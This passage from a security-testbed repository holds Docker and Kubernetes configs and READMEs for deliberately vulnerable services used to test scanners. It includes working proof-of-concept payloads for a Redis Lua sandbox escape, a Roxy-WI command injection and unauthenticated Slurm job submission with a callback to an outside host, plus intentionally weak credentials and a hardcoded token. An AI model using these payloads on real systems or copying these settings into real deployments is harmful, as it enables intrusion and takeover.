matchLabels: 25 | app: cve-2023-48022 26 | strategy: 27 | type: Recreate 28 | template: 29 | metadata: 30 | labels: 31 | app: cve-2023-48022 32 | spec: 33 | containers: 34 | - name: cve-2023-48022 35 | image: rayproject/ray:2.5.0@sha256:cb53dcc21af8f913978fd2a3fc57c812f87d99e0b40db6a42ccd6f43eca11281 36 | ports: 37 | - containerPort: 8265 38 | command: ["/bin/bash", "-c", "ray start --head --dashboard-host=0.0.0.0 && tail -f /dev/null"] 39 | -------------------------------------------------------------------------------- /redis/CVE-2022-0543/README.md: -------------------------------------------------------------------------------- 1 | # CVE-2022-0543 2 | It was discovered, that redis, a persistent key-value database, due to a packaging issue, is prone to a (Debian-specific) Lua sandbox escape, which could result in remote code execution. 3 | 4 | ## Testbed stup 5 | ### Vulnerable 6 | ```sh 7 | docker run --rm -p 6379:6379 --name rds-vuln -d vulhub/redis:5.0.7 8 | ``` 9 | 10 | ### Safe 11 | ```sh 12 | docker run --rm -p 6379:6379 --name rds-safe -d redis 13 | ``` 14 | 15 | ## Reproduction steps 16 | Test the vulnerability using the following command: 17 | ```sh 18 | echo 'eval "local io_l = package.loadlib(\"/usr/lib/x86_64-linux-gnu/liblua5.1.so.0\", \"luaopen_io\"); local io = io_l(); local f = io.popen(\"id\", \"r\"); local res = f:read(\"*a\"); f:close(); return res" 0' | nc 127.0.0.1 6379 19 | ``` 20 | 21 | A vulnerable redis instance will return the output of the `id` command, executed as root: 22 | ``` 23 | $39 24 | uid=0(root) gid=0(root) groups=0(root) 25 | ``` 26 | 27 | while a safe redis instance will return an error similar to the following: 28 | ``` 29 | -ERR user_script:1: Script attempted to access nonexistent global variable 'package' script: 59383731574f8ef9c055b3f4cf9cca078446f86d, on @user_script:1. 30 | ``` 31 | 32 | ## Cleanup 33 | Stop the running containers with the following command 34 | 35 | ```sh 36 | docker stop rds-vuln rds-safe 37 | ``` 38 | 39 | ## Vulnerable versions 40 | 41 | - For the oldstable distribution (buster), this problem has been fixed in version `5:5.0.14-1+deb10u2`. 42 | - For the stable distribution (bullseye), this problem has been fixed in version `5:6.0.16-1+deb11u2`. 43 | 44 | ## Reference 45 | - https://www.cve.org/CVERecord?id=CVE-2022-0543 46 | - https://github.com/vulhub/vulhub/tree/master/redis/CVE-2022-0543 47 | - https://lists.debian.org/debian-security-announce/2022/msg00048.html -------------------------------------------------------------------------------- /roxy-wi/cve_2022_31137/README.md: -------------------------------------------------------------------------------- 1 | # secure instance 2 | ```bash 3 | docker compose -f docker-compose-safe.yml up -d 4 | ``` 5 | Execute `curl -X POST "https://localhost/app/options.py" --data "alert_consumer=1&ipbackend=\";id+#" --insecure` command and you will receive a http redirect response like `Redirecting...` 6 | 7 | # vulnerable instance 8 | ```bash 9 | docker compose -f docker-compose.yml up -d 10 | ``` 11 | Execute `curl -X POST "https://localhost/app/options.py" --data "alert_consumer=1&ipbackend=\";id+#" --insecure` command and you will receive a similar response like `uid=48(apache) gid=48(apache) groups=48(apache)
` 12 | -------------------------------------------------------------------------------- /roxy-wi/cve_2022_31137/docker-compose-safe.yml: -------------------------------------------------------------------------------- 1 | name: roxy-wi-testbed 2 | services: 3 | roxy-wi: 4 | image: registry.roxy-wi.org/roxy-wi:7.2.6.0 5 | command: bash -c '/usr/sbin/httpd -DFOREGROUND' 6 | ports: 7 | - "443:443" 8 | -------------------------------------------------------------------------------- /roxy-wi/cve_2022_31137/docker-compose.yml: -------------------------------------------------------------------------------- 1 | name: roxy-wi-testbed 2 | services: 3 | roxy-wi: 4 | image: registry.roxy-wi.org/roxy-wi:7.2.6.0 5 | command: bash -c 'yum -y install roxy-wi-6-1.0.0.el8 && /usr/sbin/httpd -DFOREGROUND' 6 | ports: 7 | - "443:443" 8 | -------------------------------------------------------------------------------- /rstudio/weak_credentials/Dockerfile: -------------------------------------------------------------------------------- 1 | FROM rocker/rstudio:latest 2 | 3 | ENV PASSWORD=ashley 4 | ENV TERM=xterm 5 | 6 | EXPOSE 8787 7 | -------------------------------------------------------------------------------- /rstudio/weak_credentials/README.md: -------------------------------------------------------------------------------- 1 | # RStudio Server 2 | 3 | ## Setup 4 | 5 | 1. `docker build -t rstudio .` 6 | 2. `docker run --rm -p 8000:8787 rstudio` 7 | 8 | Notice that we are mapping port 8787 on 8000 to make it detectable by nmap during the scanning. Also notice that we have set the default credentials in the Dockerfile 9 | -------------------------------------------------------------------------------- /selenium/selenium_grid_rce_via_exposed_server/selenium_grid_chrome.md: -------------------------------------------------------------------------------- 1 | # Selenium Grid Chrome 2 | # Setup 3 | 4 | 1. Create docker image with this command: 5 | 6 | `docker run -d --platform linux/amd64 --name selenium-chrome -p 4444:4444 --shm-size="2g" selenium/standalone-chrome:latest` 7 | 8 | 2. Connect to the Selenium dashboard: http://localhost:4444/ 9 | 10 | 3. Verify Selenium Grid is working as intended by requesting a sample website (google.com) by running the python3 script below: 11 | 12 | ```python 13 | # selenium_test.py 14 | # Run with: 15 | # python3 selenium_test.py 16 | from selenium import webdriver 17 | from selenium.webdriver.chrome.options import Options as ChromeOptions 18 | 19 | options = ChromeOptions() 20 | options.platform_name = 'linux' 21 | driver = webdriver.Remote("http://localhost:4444/wd/hub", options=options) 22 | 23 | driver.get("https://google.com") 24 | if not "Google" in driver.title: 25 | raise Exception("Unable to load google page!") 26 | else: 27 | print("All good, google.com page loaded!") 28 | driver.quit() 29 | ``` 30 | -------------------------------------------------------------------------------- /slurm/exposed_rest_api/README.md: -------------------------------------------------------------------------------- 1 | # Slurm Testbed 2 | 3 | ## Overview 4 | The Slurm Rest API requires authentication by default. However, a common configuration involves using a reverse proxy that (theoretically) should authenticate the user with some other methods and, if successful, authenticates towards the Slurm Rest API using an hardcoded JWT token that injected into the forwarded request's headers. 5 | 6 | This configuration is reported in the official documentation [here](https://slurm.schedmd.com/rest.html#auth_proxy) and with an implementation example [here](https://gitlab.com/SchedMD/training/docker-scale-out/-/tree/production/proxy). 7 | 8 | If the reverse proxy is misconfigured to simply forward the requests without any authentication steps, it will allow anyone to use the API and get RCE by submitting malicious jobs to the cluster. 9 | 10 | ## This testbed 11 | 12 | To simulate an insecure Rest API proxy, a Caddy server is deployed in reverse-proxy mode on `127.0.0.1:8080`. The reverse proxy authenticates with the Slurm Rest API via a pre-generated JWT token with no expiration, this way there's no need to generate a new token every time the testbed is launched. 13 | 14 | The secure Slurm Rest API is also exposed on `127.0.0.1:6820` for testing purposes. 15 | 16 | ## Testbed Setup 17 | 18 | To start the testbed, simply run `docker compose up` 19 | 20 | ## Test the vulnerability 21 | You can test the vulnerability by modifying the `script` field in the `rest_api_test.json` file to the desired command to execute. For example, you can get a canary URL from a service like [webhook.site](https://webhook.site) and run a curl command to receive a callback. Here's an example: 22 | ```json 23 | { 24 | "job": { 25 | "name": "test", 26 | "ntasks": 1, 27 | "current_working_directory": "/tmp", 28 | "environment": [ 29 | "PATH:/bin:/usr/bin/:/usr/local/bin/" 30 | ] 31 | }, 32 | "script": "#!/bin/bash\ncurl https://webhook.site/11b9a510-d69d-4f51-9f93-5d236c72e6c1" 33 | } 34 | ``` 35 | Note: make sure to keep the shebang (`#!/bin/bash\n`) at the start of the string. 36 | 37 | Then you can submit the job using curl: 38 | ```sh 39 | curl http://127.0.0.1:8080/slurm/v0.0.39/job/submit -H "Content-Type: application/json" -d @rest_api_test.json 40 | ``` 41 | 42 | A response from a vulnerable API will look like this: 43 | ```json 44 | { 45 | "meta": { 46 | "plugin": { 47 | "type": "openapi\/v0.0.39", 48 | "name": "Slurm OpenAPI v0.0.39", 49 | "data_parser": "v0.0.39" 50 | }, 51 | "client": { 52 | "source": "[api-proxy.slurm-testbed_slurm-testbed-network]:10988" 53 | }, 54 | "Slurm": { 55 | "version": { 56 | "major": 24, 57 | "micro": 4, 58 | "minor": 5 59 | }, 60 | "release": "24.05.4" 61 | } 62 | }, 63 | "errors": [], 64 | "warnings": [], 65 | "result": { 66 | "job_id": 11, 67 | "step_id": "batch", 68 | "error_code": 0, 69 | "error": "No error", 70 | "job_submit_user_msg": "" 71 | }, 72 | "job_id": 11, 73 | "step_id": "batch", 74 | "job_submit_user_msg": "" 75 | } 76 | ``` 77 | 78 | To check a non-vulnerable API, you can send the request to the original Rest API on port 6820, which requires authentication by default, therefore not vulnerable: 79 | ```sh 80 | curl http://127.0.0.1:6820/slurm/v0.0.39/job/submit -H "Content-Type: application/json" -d @rest_api_test.json 81 | 82 | Authentication failure 83 | ``` 84 | 85 | As you can see, the authentication fails and the request is rejected. -------------------------------------------------------------------------------- /slurm/exposed_rest_api/docker-compose.yml: -------------------------------------------------------------------------------- 1 | name: slurm-testbed 2 | services: 3 | slurm: 4 | build: ./slurm 5 | ports: 6 | - 6820:6820 7 | networks: 8 | - slurm-testbed-network 9 | 10 | api-proxy: 11 | image: caddy:2.9-alpine 12 | container_name: api-proxy 13 | command: 14 | - "caddy" 15 | - "reverse-proxy" 16 | - "--from" 17 | - ":8080" 18 | - "--to" 19 | - "http://slurm:6820" 20 | - "--header-up" 21 | - "X-SLURM-USER-NAME: slurm" 22 | - "--header-up" 23 | - "X-SLURM-USER-TOKEN: eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJleHAiOjM4Nzk4MDQ5MjQsImlhdCI6MTczMjMyMTI3OCwic3VuIjoicm9vdCJ9.lV0sZg_KGxSck90yxVJ52vWzeL_ldtqse_Fn10vWz_0" 24 | - "--access-log" 25 | ports: 26 | - 8080:8080 27 | depends_on: 28 | - "slurm" 29 | networks: 30 | - slurm-testbed-network 31 | 32 | networks: 33 | slurm-testbed-network: 34 | driver: bridge 35 | -------------------------------------------------------------------------------- /slurm/exposed_rest_api/rest_api_test.json: -------------------------------------------------------------------------------- 1 | { 2 | "job": { 3 | "name": "test", 4 | "ntasks": 1, 5 | "current_working_directory": "/tmp", 6 | "environment": [ 7 | "PATH:/bin:/usr/bin/:/usr/local/bin/" 8 | ] 9 | }, 10 | "script": "#!/bin/bash\ncurl https://webhook.site/11b9a510-d69d-4f51-9f93-5d236c72e6c1" 11 | } 12 | -------------------------------------------------------------------------------- /slurm/exposed_rest_api/slurm/Dockerfile: -------------------------------------------------------------------------------- 1 | # Slurm 24 is not available in bookworm 2 | FROM debian:trixie-slim 3 | 4 | ARG DEBIAN_FRONTEND=noninteractive 5 | 6 | RUN set -ex \ 7 | && apt-get update -y \ 8 | && apt-get install -y \ 9 | slurm-wlm \ 10 | slurmrestd \ 11 | slurm-wlm-basic-plugins \ 12 | slurm-wlm-jwt-plugin \ 13 | munge \ 14 | curl 15 | 16 | RUN mkdir -p /etc/sysconfig/slurm \ 17 | /var/spool/slurm \ 18 | /var/run/slurm \ 19 | /var/lib/slurm \ 20 | /var/log/slurm \ 21 | /var/spool/slurm/statesave \ 22 | /run/munge \ 23 | /data 24 | RUN touch /var/lib/slurm/node_state \ 25 | /var/lib/slurm/front_end_state \ 26 | /var/lib/slurm/job_state \ 27 | /var/lib/slurm/resv_state \ 28 | /var/lib/slurm/trigger_state \ 29 | /var/lib/slurm/assoc_mgr_state \ 30 | /var/lib/slurm/assoc_usage \ 31 | /var/lib/slurm/qos_usage \ 32 | /var/lib/slurm/fed_mgr_state 33 | 34 | # Generate key for JWT authentication 35 | # RUN dd if=/dev/random of=/var/spool/slurm/statesave/jwt_hs256.key bs=32 count=1 36 | 37 | # Let's use a static JWT key for testing 38 | COPY jwt_hs256.key /var/spool/slurm/statesave/jwt_hs256.key 39 | 40 | # Set permissions 41 | RUN chown -R slurm:slurm /var/*/slurm* 42 | RUN chown -R munge:munge /run/munge 43 | RUN chmod 0600 /var/spool/slurm/statesave/jwt_hs256.key \ 44 | && chmod 0755 /var/spool/slurm/statesave 45 | 46 | COPY slurm.conf /etc/slurm/slurm.conf 47 | COPY cgroup.conf /etc/slurm/cgroup.conf 48 | 49 | COPY entrypoint.sh /entrypoint.sh 50 | ENTRYPOINT ["/entrypoint.sh"] -------------------------------------------------------------------------------- /slurm/exposed_rest_api/slurm/cgroup.conf: -------------------------------------------------------------------------------- 1 | CgroupPlugin=disabled 2 | IgnoreSystemd=yes -------------------------------------------------------------------------------- /slurm/exposed_rest_api/slurm/entrypoint.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | set -e 3 | 4 | # Start munge 5 | service munge start 6 | sleep 1 7 | 8 | # Start slurmctld and wait for it to start 9 | /usr/sbin/slurmctld -i -Dvv & 10 | sleep 2 11 | until 2>/dev/null >/dev/tcp/127.0.0.1/6817 12 | do 13 | echo "Waiting for slurmctld to start" 14 | sleep 2 15 | done 16 | 17 | # Start slurmd (worker process) 18 | /usr/sbin/slurmd -Dvv & 19 | 20 | # Start slurmrestd 21 | export SLURM_JWT="daemon" 22 | export SLURMRESTD_SECURITY="disable_unshare_files,disable_unshare_sysv,disable_user_check" 23 | /usr/sbin/slurmrestd 0.0.0.0:6820 -a rest_auth/jwt -vv -------------------------------------------------------------------------------- /slurm/exposed_rest_api/slurm/jwt_hs256.key: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/google/security-testbeds/1bbb218d8941f47f817d4d8bffc56ea37c7ef1c6/slurm/exposed_rest_api/slurm/jwt_hs256.key -------------------------------------------------------------------------------- /slurm/exposed_rest_api/slurm/slurm.conf: -------------------------------------------------------------------------------- 1 | # slurm.conf 2 | # 3 | # See the slurm.conf man page for more information. 4 | # 5 | ClusterName=linux 6 | ControlMachine=localhost 7 | ControlAddr=localhost 8 | SlurmctldPort=6817 9 | SlurmdPort=6818 10 | AuthType=auth/munge 11 | AuthAltTypes=auth/jwt 12 | AuthAltParameters=jwt_key=/var/spool/slurm/statesave/jwt_hs256.key 13 | StateSaveLocation=/var/lib/slurm 14 | SlurmdSpoolDir=/var/spool/slurm 15 | SwitchType=switch/none 16 | MpiDefault=none 17 | SlurmctldPidFile=/var/run/slurm/slurmctld.pid 18 | SlurmdPidFile=/var/run/slurm/slurmd.pid 19 | ProctrackType=proctrack/linuxproc 20 | ReturnToService=0 21 | # 22 | # TIMERS 23 | SlurmctldTimeout=300 24 | SlurmdTimeout=300 25 | InactiveLimit=0 26 | MinJobAge=300 27 | KillWait=30 28 | Waittime=0 29 | # 30 | # SCHEDULING 31 | SchedulerType=sched/backfill 32 | SelectType=select/cons_tres 33 | SelectTypeParameters=CR_CPU_Memory 34 | # 35 | # LOGGING 36 | SlurmctldDebug=3 37 | SlurmctldLogFile=/var/log/slurm/slurmctld.log 38 | SlurmdDebug=3 39 | SlurmdLogFile=/var/log/slurm/slurmd.log 40 | JobCompType=jobcomp/filetxt 41 | JobCompLoc=/var/log/slurm/jobcomp.log 42 | # 43 | # ACCOUNTING 44 | JobAcctGatherType=jobacct_gather/linux 45 | JobAcctGatherFrequency=30 46 | # 47 | # COMPUTE NODES 48 | NodeName=localhost RealMemory=1000 State=UNKNOWN 49 | # 50 | # PARTITIONS 51 | PartitionName=normal Default=yes Nodes=localhost Priority=50 DefMemPerCPU=500 Shared=NO MaxNodes=2 MaxTime=5-00:00:00 DefaultTime=5-00:00:00 State=UP 52 | -------------------------------------------------------------------------------- /smb/weak_credentials/smb.md: -------------------------------------------------------------------------------- 1 | # SMB 2 | # Setup 3 | 4 | 1. Create docker image with this command: 5 | ``` 6 | sudo docker run -it -p 139:139 -p 445:445 -d dperson/samba -p \ 7 | -u "example1;badpass" \ 8 | -u "example2;badpass" \ 9 | -s "public;/share;yes;no;no" \ 10 | -s "users;/srv;no;no;no;example1,example2" \ 11 | -s "example1 private share;/example1;no;no;no;example1" \ 12 | -s "example2 private share;/example2;no;no;no;example2" \ 13 | -g "restrict anonymous=2" \ 14 | -g "map to guest = Bad User" -S 15 | 16 | ``` 17 | 18 | 2. Run and verify that it is up and running: `smbclient -L ip-addr -U user` 19 | 20 | 3. Verify that it is working properly: `smbclient //ip-addr/IPC$ -U user` -------------------------------------------------------------------------------- /spring/spring_cloud/spring_cloud_function/CVE-2022-22963/README.md: -------------------------------------------------------------------------------- 1 | # Spring Cloud Function CVE-2022-22963 2 | 3 | This directory contains the deployment configs for a Spring Cloud Function 4 | application with vulnerability to CVE-2022-22963 using SpEL injection. 5 | 6 | This configs deploys service `scf-cve-2022-22963` and listens on port `8080`. 7 | 8 | ## Template data 9 | 10 | ```json 11 | { 12 | "scf_version": "3.2.2" 13 | } 14 | ``` 15 | -------------------------------------------------------------------------------- /spring/spring_cloud/spring_cloud_function/CVE-2022-22963/spring-cloud-function.yaml: -------------------------------------------------------------------------------- 1 | # k8s LoadBalancer Service exposing an Spring Cloud Function instance. 2 | apiVersion: v1 3 | kind: Service 4 | metadata: 5 | name: scf-cve-2022-22963 6 | labels: 7 | app: scf-cve-2022-22963 8 | version: ${scf_version} 9 | spec: 10 | ports: 11 | - port: 8080 12 | name: http 13 | targetPort: 8080 14 | selector: 15 | app: scf-cve-2022-22963 16 | version: ${scf_version} 17 | type: LoadBalancer 18 | --- 19 | apiVersion: apps/v1 20 | kind: Deployment 21 | metadata: 22 | name: scf-cve-2022-22963 23 | labels: 24 | app: scf-cve-2022-22963 25 | version: ${scf_version} 26 | spec: 27 | selector: 28 | matchLabels: 29 | app: scf-cve-2022-22963 30 | version: ${scf_version} 31 | tier: frontend 32 | strategy: 33 | type: Recreate 34 | template: 35 | metadata: 36 | labels: 37 | app: scf-cve-2022-22963 38 | tier: frontend 39 | version: ${scf_version} 40 | spec: 41 | containers: 42 | - name: scf-cve-2022-22963 43 | image: threedr3am/spring-cloud-function-sample:${scf_version} 44 | ports: 45 | - containerPort: 8080 46 | -------------------------------------------------------------------------------- /ssh/weak_credentials/Dockerfile: -------------------------------------------------------------------------------- 1 | FROM ubuntu:latest 2 | RUN apt update && apt install openssh-server sudo -y 3 | RUN useradd -rm -d /home/ubuntu -s /bin/bash -g root -G sudo -u 1000 test 4 | RUN echo 'test:test' | chpasswd 5 | RUN service ssh start 6 | EXPOSE 22 7 | CMD [ "/usr/sbin/sshd", "-D" ] -------------------------------------------------------------------------------- /ssh/weak_credentials/ssh.md: -------------------------------------------------------------------------------- 1 | # SSH 2 | # Setup 3 | 4 | 1. Create a docker image from the Dockerfile in this directory by running: `docker build -t myssh:latest .` 5 | 2. Start the ssh server by running: `docker run -p 8222:22 myssh:latest` 6 | 3. Verify ssh is working by doing: `ssh user@ip` 7 | -------------------------------------------------------------------------------- /strapi/CVE-2023-22893/README.md: -------------------------------------------------------------------------------- 1 | # Strapi CVE-2023-22893 2 | 3 | CVE-2023-22893 is an authentication bypass in strapi when using the AWS cognito 4 | provider. 5 | 6 | ```sh 7 | $ docker build -t strapi:vuln -f vulnerable.Dockerfile . 8 | $ docker create --name strapi -p 127.0.0.1:1337:1337 strapi:vuln 9 | $ docker start strapi 10 | 11 | $ docker build -t strapi:novuln -f non-vulnerable.Dockerfile . 12 | $ docker create --name strapi -p 127.0.0.1:1337:1337 strapi:novuln 13 | $ docker start strapi 14 | ``` 15 | 16 | Both images requires post-installation setup: 17 | 18 | - You will need to create an admin account (app running on TCP port 1337) 19 | - The AWS cognito provider must be enabled: 20 | * Administration panel > Settings > User & Permissions plugin > Providers 21 | * Edit button 22 | * Set enable to TRUE 23 | * Set random values for Client ID, Client Secret and Host URI 24 | * If setting up the non-vulnerable instance, don't forget to set a JWKS URL 25 | that is different from `http://127.0.0.1:1337/tsunami/` 26 | 27 | From this point on, the instance should be ready. 28 | -------------------------------------------------------------------------------- /strapi/CVE-2023-22893/non-vulnerable.Dockerfile: -------------------------------------------------------------------------------- 1 | from node:16.13.0-slim 2 | 3 | RUN npx create-strapi-app@4.6.0 --quickstart --no-run myproject 4 | WORKDIR myproject 5 | RUN yarn 6 | RUN npm rebuild 7 | 8 | ENTRYPOINT yarn develop 9 | -------------------------------------------------------------------------------- /strapi/CVE-2023-22893/vulnerable.Dockerfile: -------------------------------------------------------------------------------- 1 | from node:16.13.0-slim 2 | 3 | RUN npx create-strapi-app@4.5.0 --quickstart --no-run myproject 4 | WORKDIR myproject 5 | RUN yarn 6 | RUN npm rebuild 7 | 8 | ENTRYPOINT yarn develop 9 | -------------------------------------------------------------------------------- /telnet/weak_credentials/telnet.md: -------------------------------------------------------------------------------- 1 | # Telnet 2 | # Setup 3 | 1: Create docker images with this command: `docker run -itd --name=telnetServer flemingcsi/telnet-server` 4 | 5 | 2: Verify docker is up with this command and check ports: `docker ps` 6 | 7 | 3: Verify to see if working properly with this command: `telnet (image ipaddress)` 8 | 9 | 4: Log in with the credentials root:malware 10 | -------------------------------------------------------------------------------- /triton/triton-inference-server/ASimpleModel/1/model.py: -------------------------------------------------------------------------------- 1 | import os 2 | 3 | class TritonPythonModel: 4 | 5 | def initialize(self, args): 6 | print("init") 7 | 8 | def execute(self, requests): 9 | return 10 | 11 | def finalize(self): 12 | return 13 | -------------------------------------------------------------------------------- /triton/triton-inference-server/ASimpleModel/config.pbtxt: -------------------------------------------------------------------------------- 1 | name: "MODEL_NAME" 2 | backend: "python" 3 | 4 | input [ 5 | { 6 | name: "input__0" 7 | data_type: TYPE_FP32 8 | dims: [ -1, 3 ] 9 | } 10 | ] 11 | 12 | output [ 13 | { 14 | name: "output__0" 15 | data_type: TYPE_FP32 16 | dims: [ -1, 1 ] 17 | } 18 | ] 19 | 20 | instance_group [ 21 | { 22 | count: 1 23 | kind: KIND_CPU 24 | } 25 | ] 26 | 27 | parameters [ 28 | { 29 | key: "INFERENCE_MODE" 30 | value: { string_value: "true" } 31 | } 32 | ] 33 | -------------------------------------------------------------------------------- /triton/triton-inference-server/README.md: -------------------------------------------------------------------------------- 1 | # Triton inference server RCE 2 | 3 | publicly exposed Triton inference servers before version 2.40 with `--model-control explicit` options are vulnerable to remote code execution by dynamic model loading through the model control APIs. 4 | 5 | Detailed blog post: https://protectai.com/threat-research/triton-inference-server-arbitrary-file-overwrite 6 | Metasploit module: https://github.com/protectai/ai-exploits/tree/main/triton 7 | 8 | # safe version instance setup 9 | A safe version is loaded with no initial models so we can't overwrite any model and we can't exploit the server. 10 | ```bash 11 | docker run --rm -p8000:8000 -p8001:8001 -p8002:8002 -v APathWithNoModelInside/:/models nvcr.io/nvidia/tritonserver:23.10-py3 tritonserver --model-repository=/models --model-control explicit 12 | ``` 13 | 14 | # vulnerable version instance setup 15 | ```bash 16 | docker run --rm -p8000:8000 -p8001:8001 -p8002:8002 -v ASimpleModel/:/models nvcr.io/nvidia/tritonserver:23.10-py3 tritonserver --model-repository=/models --model-control explicit 17 | ``` 18 | -------------------------------------------------------------------------------- /vbulletin/CVE-2019-16759/README.md: -------------------------------------------------------------------------------- 1 | # vBulletin pre-auth RCE vulnerability (CVE-2019-16759) 2 | 3 | This directory contains the deployment configs for a vBulletin application with 4 | pre-auth RCE vulnerability (CVE-2019-16759). 5 | 6 | The deployed service has name `vbulletin-cve-2019-16759` and listens on port 7 | `80`. 8 | 9 | -------------------------------------------------------------------------------- /vbulletin/CVE-2019-16759/vbulletin_cve_2019_16759.yaml: -------------------------------------------------------------------------------- 1 | # k8s LoadBalancer Service exposing the vBulletin service. 2 | apiVersion: v1 3 | kind: Service 4 | metadata: 5 | name: vbulletin-cve-2019-16759 6 | labels: 7 | app: vbulletin-cve-2019-16759 8 | spec: 9 | ports: 10 | - port: 80 11 | selector: 12 | app: vbulletin-cve-2019-16759 13 | type: LoadBalancer 14 | --- 15 | # The vulnerable vBulletin service. 16 | apiVersion: apps/v1 17 | kind: Deployment 18 | metadata: 19 | name: vbulletin-cve-2019-16759 20 | labels: 21 | app: vbulletin-cve-2019-16759 22 | spec: 23 | selector: 24 | matchLabels: 25 | app: vbulletin-cve-2019-16759 26 | tier: frontend 27 | strategy: 28 | type: Recreate 29 | template: 30 | metadata: 31 | labels: 32 | app: vbulletin-cve-2019-16759 33 | tier: frontend 34 | spec: 35 | containers: 36 | - name: vbulletin-cve-2019-16759 37 | image: co0ontty/vbulletin_5.x_rce:latest 38 | ports: 39 | - containerPort: 80 40 | -------------------------------------------------------------------------------- /vnc/weak_credentials/vnc.md: -------------------------------------------------------------------------------- 1 | # VNC 2 | # Setup 3 | 1: Create docker images with this command: `docker run -d -p 5901:5901 -p 6901:6901 consol/rocky-xfce-vnc` 4 | 5 | 2: Verify docker is up with this command and check ports: `docker ps` 6 | 7 | 3: Verify to see if working properly by using a VNC client and logging in with the image ip address and the password: `vncpassword` 8 | -------------------------------------------------------------------------------- /wordpress/unfinished_installation/README.md: -------------------------------------------------------------------------------- 1 | # WordPress with exposed installation page 2 | 3 | This directory contains the deployment configs for a WordPress application where 4 | the installation page is exposed. The service listens on port `80`. 5 | 6 | This config deploys the following services: 7 | 8 | - `pre-setup-wp`: the WordPress application. 9 | - `pre-setup-wp-mysql`: the MySql database for the WordPress application. 10 | 11 | and the following storage: 12 | 13 | - `mysql-pv-claim`: File system required by MySql. 14 | - `pre-setup-wp-pv-claim`: File system required by WordPress. 15 | 16 | Replace `${db_password}` with a password of your choice in wordpress.yaml -------------------------------------------------------------------------------- /wordpress/unfinished_installation/mysql.yaml: -------------------------------------------------------------------------------- 1 | # The k8s service exposing the MySQL service. 2 | apiVersion: v1 3 | kind: Service 4 | metadata: 5 | name: pre-setup-wp-mysql 6 | labels: 7 | app: pre-setup-wp 8 | spec: 9 | ports: 10 | - port: 3306 11 | selector: 12 | app: pre-setup-wp 13 | tier: pre-setup-wp-mysql 14 | clusterIP: None 15 | --- 16 | # The PVC required by the MySQL app. 17 | apiVersion: v1 18 | kind: PersistentVolumeClaim 19 | metadata: 20 | name: mysql-pv-claim 21 | labels: 22 | app: pre-setup-wp 23 | spec: 24 | accessModes: 25 | - ReadWriteOnce 26 | resources: 27 | requests: 28 | storage: 20Gi 29 | --- 30 | # The MySQL app. 31 | apiVersion: apps/v1 32 | kind: Deployment 33 | metadata: 34 | name: pre-setup-wp-mysql 35 | labels: 36 | app: pre-setup-wp 37 | spec: 38 | selector: 39 | matchLabels: 40 | app: pre-setup-wp 41 | tier: pre-setup-wp-mysql 42 | strategy: 43 | type: Recreate 44 | template: 45 | metadata: 46 | labels: 47 | app: pre-setup-wp 48 | tier: pre-setup-wp-mysql 49 | spec: 50 | containers: 51 | - image: mysql:5.6 52 | name: pre-setup-wp-mysql 53 | env: 54 | - name: MYSQL_ROOT_PASSWORD 55 | value: ${db_password} 56 | ports: 57 | - containerPort: 3306 58 | volumeMounts: 59 | - name: pre-setup-wp-mysql-persistent-storage 60 | mountPath: /var/lib/mysql 61 | volumes: 62 | - name: pre-setup-wp-mysql-persistent-storage 63 | persistentVolumeClaim: 64 | claimName: mysql-pv-claim 65 | -------------------------------------------------------------------------------- /wordpress/unfinished_installation/wordpress.yaml: -------------------------------------------------------------------------------- 1 | # The k8s service exposing the WordPress app. 2 | apiVersion: v1 3 | kind: Service 4 | metadata: 5 | name: pre-setup-wp 6 | labels: 7 | app: pre-setup-wp 8 | spec: 9 | ports: 10 | - port: 80 11 | selector: 12 | app: pre-setup-wp 13 | tier: frontend 14 | type: LoadBalancer 15 | --- 16 | # The PVC required by the WordPress app. 17 | apiVersion: v1 18 | kind: PersistentVolumeClaim 19 | metadata: 20 | name: pre-setup-wp-pv-claim 21 | labels: 22 | app: pre-setup-wp 23 | spec: 24 | accessModes: 25 | - ReadWriteOnce 26 | resources: 27 | requests: 28 | storage: 20Gi 29 | --- 30 | # WordPress application. 31 | apiVersion: apps/v1 32 | kind: Deployment 33 | metadata: 34 | name: pre-setup-wp 35 | labels: 36 | app: pre-setup-wp 37 | spec: 38 | selector: 39 | matchLabels: 40 | app: pre-setup-wp 41 | tier: frontend 42 | strategy: 43 | type: Recreate 44 | template: 45 | metadata: 46 | labels: 47 | app: pre-setup-wp 48 | tier: frontend 49 | spec: 50 | # By default the wordpress image is in the pre-setup state. 51 | containers: 52 | - image: wordpress 53 | name: pre-setup-wp 54 | env: 55 | - name: WORDPRESS_DB_HOST 56 | value: pre-setup-wp-mysql 57 | - name: WORDPRESS_DB_PASSWORD 58 | value: ${db_password} 59 | ports: 60 | - containerPort: 80 61 | volumeMounts: 62 | - name: pre-setup-wp-persistent-storage 63 | mountPath: /var/www/html 64 | volumes: 65 | - name: pre-setup-wp-persistent-storage 66 | persistentVolumeClaim: 67 | claimName: pre-setup-wp-pv-claim 68 | -------------------------------------------------------------------------------- /wordpress/weak_credentials/docker-compose.yml: -------------------------------------------------------------------------------- 1 | version: '3.1' 2 | 3 | services: 4 | 5 | wordpress: 6 | image: wordpress 7 | restart: always 8 | ports: 9 | - 8080:80 10 | environment: 11 | WORDPRESS_DB_HOST: db 12 | WORDPRESS_DB_USER: exampleuser 13 | WORDPRESS_DB_PASSWORD: examplepass 14 | WORDPRESS_DB_NAME: exampledb 15 | volumes: 16 | - wordpress:/var/www/html 17 | 18 | db: 19 | image: mysql:5.7 20 | restart: always 21 | environment: 22 | MYSQL_DATABASE: exampledb 23 | MYSQL_USER: exampleuser 24 | MYSQL_PASSWORD: examplepass 25 | MYSQL_RANDOM_ROOT_PASSWORD: '1' 26 | volumes: 27 | - db:/var/lib/mysql 28 | 29 | volumes: 30 | wordpress: 31 | db: -------------------------------------------------------------------------------- /wordpress/weak_credentials/wordpress.md: -------------------------------------------------------------------------------- 1 | # Wordpress 2 | # Setup 3 | 4 | 1. View the docker-compose.yml file to view the selected username and password 5 | 6 | 2. Run the compose file in this directory: `docker-compose up` 7 | 8 | 3. Connect to it locally by going to `localhost:8080` and configure it using the setup client 9 | 10 | 4. Verify to see if working properly: Log in by visiting `localhost:8080` and using root credentials -------------------------------------------------------------------------------- /xrdp/weak_credentials/README.md: -------------------------------------------------------------------------------- 1 | # xrdp Weak Credential Setup 2 | 3 | ## Option 1 - GCE VM 4 | 5 | 1. Create a new debian based GCE VM 6 | 2. Install graphical interface and enable xrdp. You can follow the reference at 